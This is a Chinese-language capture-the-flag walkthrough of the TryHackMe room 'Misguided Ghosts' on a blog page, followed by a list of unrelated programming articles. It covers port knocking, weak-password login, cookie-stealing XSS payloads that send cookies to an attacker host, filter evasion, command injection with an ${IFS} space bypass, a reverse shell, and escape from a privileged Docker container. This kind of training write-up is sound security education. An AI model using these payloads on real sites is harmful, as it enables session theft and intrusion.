当前位置：首页 > news >正文

TryHackMe-Misguided Ghosts（boot2root）

news 2025/12/15 9:23:37

Misguided Ghosts

端口扫描

循例nmap

在这里插入图片描述

FTP枚举

直接登anonymous，有几个文件，下下来

在这里插入图片描述

info.txt

我已经包含了您要求的所有网络信息，以及一些我最喜欢的笑话。- 帕拉摩尔

该信息可能指的是pcapng文件

jokes.txt

Taylor: Knock, knock.
Josh:   Who's there?
Taylor: The interrupting cow.
Josh:   The interrupting cow--
Taylor: MooJosh:   Knock, knock.
Taylor: Who's there?
Josh:   Adore.
Taylor: Adore who?
Josh:   Adore is between you and I so please open up!

这里的暗示很明显，端口敲门无疑

端口敲门

打开pacapng文件分析，最终联合上文信息猜测应该有端口敲门的数据包

当向关闭的tcp端口发送 syn的时候，总是会回复RST ACK，所以可以基本确定这就是端口敲门的数据包

在这里插入图片描述

nc一把梭

在这里插入图片描述

nmap再扫一遍，开了个8080，注意是https的

在这里插入图片描述

Web枚举

进到8080的https

在这里插入图片描述

gobuster扫一下

在这里插入图片描述

/console可以执行python代码，但需要先输入pin，但我们目前并没有

在这里插入图片描述

到login看一下，正常的登录框，但我们目前没有任何凭据以及用户名，根据之前的经验，看一下https的证书

在这里插入图片描述

这里有个邮箱，zac应该就是用户名，拿去尝试弱口令

使用zac:zac凭据成功登录

在这里插入图片描述

这里有一条信息：

Create a post below; admins will check every two minutes so don't be rude.

这意味着我们可以尝试xss来捕获admin的cookie

<script>fetch('http://10.14.39.48:8000/?cookie=' + btoa(document.cookie));</script>

发现有过滤

在这里插入图片描述

fetch和iframe的请求似乎都会被拦截，这里通过img可以通过

&lt;scscriptript&gt;var a = new Image();a.src = 'http://10.14.39.48:8000/?cookie='+btoa(document.cookie);&lt;/scscriptript&gt;

在这里插入图片描述

稍等一会，admin就会到来

在这里插入图片描述

base64解码后把cookie丢到cookie editor

在这里插入图片描述

似乎也没啥东西，带着cookie再扫一遍目录

在这里插入图片描述

/photos，一个文件上传

在这里插入图片描述

尝试上传的时候发现图片都传不上去，回显是显示文件不存在

在这里插入图片描述

根据之前的经验，可能是执行的类似ls的命令，尝试绕过

在这里插入图片描述

能够rce，尝试reverse shell

甚至还有空格过滤

在这里插入图片描述

通过${IFS}轻松绕过

在这里插入图片描述

Docker逃逸

进来就看见.dockerenv

在这里插入图片描述

可以看到使用了–privileged以特权身份运行

根据HackTricks的Trick，我们能够访问到所有设备，我们可以直接把宿主机的disk直接挂载过来

在这里插入图片描述

fdisk查看, 有个19GB的，是它没错了

在这里插入图片描述

mount挂载过来

在这里插入图片描述

成功拿到user和root flag

在这里插入图片描述

TryHackMe-Misguided Ghosts（boot2root）

Misguided Ghosts 端口扫描循例nmap FTP枚举直接登anonymous，有几个文件，下下来 info.txt 我已经包含了您要求的所有网络信息，以及一些我最喜欢的笑话。- 帕拉摩尔该信息可能指的是pcapng文件 jokes.txt Taylor: Knock, knock. Josh: …...

编程日记 2023/4/27 11:19:49

【Leetcode】10. 正则表达式匹配

10. 正则表达式匹配（困难） 题解如果从左向右进行匹配的话，需要考虑字符后是否有 * 。因此选择从右向左扫描更为简单。 *前面肯定有一个字符，它像是一个拷贝器，能够复制前面的单个字符，甚至也可以把这个…...

编程日记 2023/4/27 11:14:48

不得不说的结构型模式-装饰器模式

目录装饰器模式是什么下面是装饰器模式的一个通用的类图： 以下是使用C实现装饰器模式的示例代码： 下面是面试中关于桥接器模式的常见的问题： 下面是问题的答案： 装饰器模式是什么装饰器模式是一种结构型设计模式&#xff…...

编程日记 2023/4/27 11:09:46

Flutter+YesAPI 快速构建零运维的APP

前言移动互联网经过多年的发展，已经进入一个成熟的阶段，几乎每个公司都有自己的移动应用程序或移动网站。随着5G技术的不断发展，也带来了更高效的数据传输速度和更稳定的网络连接，这使得更多的应用程序和服务能够在互联网上运行&…...

编程日记 2023/4/27 11:04:45

使用Socks5代理保障HTTP传输的网络安全

一、引言在互联网时代，网络安全越来越受到人们的关注，特别是在数据传输过程中，很容易出现信息泄露、窃听等安全问题。为了保障网络传输的安全性，我们可以使用代理服务器来进行传输，而Socks5代理是其中一种常用的代理…...

编程日记 2023/4/27 10:59:43

C语言入门篇——操作符篇

目录 1、操作符分类 2、操作符的属性 3、算术操作符 4、移位操作符 5、位操作符 6、赋值操作符 7、单目操作符 8、关系操作符 9、逻辑操作符 10、条件操作符 11、逗号操作符 12、下标引用、函数调用和结构成员 1、操作符分类算术操作符（，-&…...

编程日记 2023/4/27 10:54:41

YOLOv7训练自己的数据集(txt文件，笔记）

目录 1.代码下载 2.数据集准备（.xml转.txt) （1）修改图像文件名 （2）图片和标签文件数量不对应，解决办法 （3）.xml转.txt （4）.txt文件随机划分出对应的训练…...

编程日记 2023/5/30 5:11:31

防止机械/移动硬盘休眠 - NoSleepHD

防止机械/移动硬盘休眠 - NoSleepHD 前言解决方案计算机硬盘移动硬盘前言机械硬盘休眠后唤醒需要一定时间，且频繁的启动和停止并不有利于硬盘的寿命，因此可根据自身需求防止机械硬盘休眠，下文以Win10系统为例介绍解决方案。值得一提的是…...

编程日记 2023/4/27 10:39:36

（二）app自动化脚本录制回放

上一篇：(一)app自动化测试环境搭建（maciosairtest ）_airtest环境搭建_要开朗的spookypop的博客-CSDN博客注：后续都是用IOS设备来介绍自动化测试，安卓就不赘述了。接上一篇，搭建好自动化测试环境后&#…...

编程日记 2023/4/27 10:34:35

STM32HAL库USART外设配置流程及库函数讲解

HAL库中USART外设配置流程及库函数讲解一说到串口通信，及必须说一下aRS-232/485协议。232协议标准物理接口就是我们常用的DB9串口线 RS-232电平： 逻辑1：-15~-3 逻辑0： 3~15 COMS电平： 逻辑1：3.3 逻辑0&a…...

编程日记 2023/4/27 10:29:34

Qt 实现TCP通信和UDP通信

Qt 实现TCP通信和UDP通信 1、TCP通信 QT中实现TCP通信主要用到了以下类：QTcpServer、QTcpSocket、QHostAddress等； 使用QTcpServer来创建一个TCP服务器，在新的连接建立时，将新建立连接的socket添加到列表中，以便发送…...

编程日记 2023/5/29 19:59:02

完成近4亿元C轮融资＋自研底盘域控，本土线控制动玩家“拼”了

显然，线控制动赛道已经进入白热化竞争阶段。高工智能汽车研究院监测数据显示，2022年中国市场（不含进出口）乘用车前装搭载线控制动系统（One-Box，Two-Box）上险交付合计497.39万辆，同…...

编程日记 2023/4/27 10:19:31

【UE】一个简易的游戏计时器

效果步骤 1. 打开“ThirdPersonGameMode” 创建两个整型变量，分别命名为“Seconds”、“Minutes” 在事件图表中添加如下节点，实现“Seconds”每秒加1 继续添加如下节点： 当秒数大于60时，就让分钟数1，然后将秒数重新…...

编程日记 2023/4/27 10:14:29

Leetcode力扣秋招刷题路-0455

从0开始的秋招刷题路，记录下所刷每道题的题解，帮助自己回顾总结 455. 分发饼干假设你是一位很棒的家长，想要给你的孩子们一些小饼干。但是，每个孩子最多只能给一块饼干。对每个孩子 i，都有一个胃口值 g[i]&#x…...

编程日记 2023/4/27 10:09:22

一小时学会CSS （上）

1、CSS是什么？ CSS （Cascading Style Sheets）层叠样式表，是一种来为结构化文档，例如HTML 、XML 添加字体，间距和颜色等样式的计算机语言,扩展名是.CSS 。 2、CSS语法规则 CSS写在哪里，CSS写在…...

编程日记 2023/4/27 10:04:20

参考文章 1、https://medium.com/swlh/alpine-slim-stretch-buster-jessie-bullseye-bookworm-what-are-the-differences-in-docker-62171ed4531d 2、https://stackoverflow.com/questions/52083380/in-docker-image-names-what-is-the-difference-between-alpine-jessie-stret…...

编程日记 2023/4/27 9:59:18

TryHackMe-Misguided Ghosts（boot2root）

Misguided Ghosts

端口扫描

FTP枚举

端口敲门

Web枚举

Docker逃逸

相关文章：

TryHackMe-Misguided Ghosts（boot2root）

【Leetcode】10. 正则表达式匹配

不得不说的结构型模式-装饰器模式

Flutter+YesAPI 快速构建零运维的APP

使用Socks5代理保障HTTP传输的网络安全

C语言入门篇——操作符篇

YOLOv7训练自己的数据集(txt文件，笔记）

防止机械/移动硬盘休眠 - NoSleepHD

（二）app自动化脚本录制回放

STM32HAL库USART外设配置流程及库函数讲解

Qt 实现TCP通信和UDP通信

完成近4亿元C轮融资＋自研底盘域控，本土线控制动玩家“拼”了

【UE】一个简易的游戏计时器

Leetcode力扣秋招刷题路-0455

一小时学会CSS （上）

DockerImage镜像版本说明

ROS学习第三十三节——Arbotix使用

ElasticSearch第十九讲 ES-best fields,most fields策略

Netty详解,5分钟了解，面试不用慌

Logstash学习

脑机新手指南（八）：OpenBCI_GUI：从环境搭建到数据可视化（下）

【OSG学习笔记】Day 18: 碰撞检测与物理交互

Python：操作 Excel 折叠

CentOS下的分布式内存计算Spark环境部署

深入理解JavaScript设计模式之单例模式

【SQL学习笔记1】增删改查+多表连接全解析（内附SQL免费在线练习工具）

【android bluetooth 框架分析 04】【bt-framework 层详解 1】【BluetoothProperties介绍】

WEB3全栈开发——面试专业技能点P2智能合约开发（Solidity）

Axios请求超时重发机制

【JavaWeb】Docker项目部署